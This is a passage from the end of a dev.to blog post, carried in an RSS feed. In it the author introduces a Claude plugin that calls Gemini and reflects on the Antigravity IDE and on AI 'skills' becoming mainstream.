&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fle04eoxn8efeiksq3fyy.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fle04eoxn8efeiksq3fyy.webp" alt="Since you might want to use it as well, I wrapped it as a Claude Plugin: stared/gemini-claude-skills. In addition, I added a way to consult Gemini 3 Pro - for search, reasoning, and its vision skills." width="800" height="649"&gt;&lt;/a&gt;Since you might want to use it as well, I wrapped it as a Claude Plugin: &lt;a href="https://github.com/stared/gemini-claude-skills" rel="noopener noreferrer"&gt;stared/gemini-claude-skills&lt;/a&gt;. In addition, I added a way to consult Gemini 3 Pro - for search, reasoning, and &lt;a href="https://blog.google/technology/developers/gemini-3-pro-vision/" rel="noopener noreferrer"&gt;its vision skills.&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Antigravity is a new IDE in town. While right now there are many rough edges, I am sure it will get polished. It is hard to predict what will happen in the arena of AI-first Visual Studio Code forks.&lt;/p&gt;

&lt;p&gt;But I think there is a much bigger thing going on - skills. As Simon Willison noted, &lt;a href="https://simonwillison.net/2025/Oct/16/claude-skills/" rel="noopener noreferrer"&gt;Claude Skills are awesome, maybe a bigger deal than MCP&lt;/a&gt;. I was skeptical when I read his post (mid-Oct 2025). Now it is becoming mainstream, and &lt;a href="https://simonwillison.net/2025/Dec/12/openai-skills/" rel="noopener noreferrer"&gt;ChatGPT joined the skill game&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Skills let models transcend their own abilities - not only because they carry recipes, but because they can call other models as well. That way, the question of which base model you use matters less. Even when a newer, better model is released, you don’t need to change your editor - you just swap what your skills call.&lt;/p&gt;

&lt;p&gt;Which skills are your favorites? Which skills do you want to teach your favourite tool today? And for generating images, would you still copy-and-paste your prompt into a chat window, or wire it into your workflow?&lt;/p&gt;

</description>
      <category>ai</category>
      <category>claude</category>
      <category>antigravity</category>
    </item>
  </channel>
</rss>
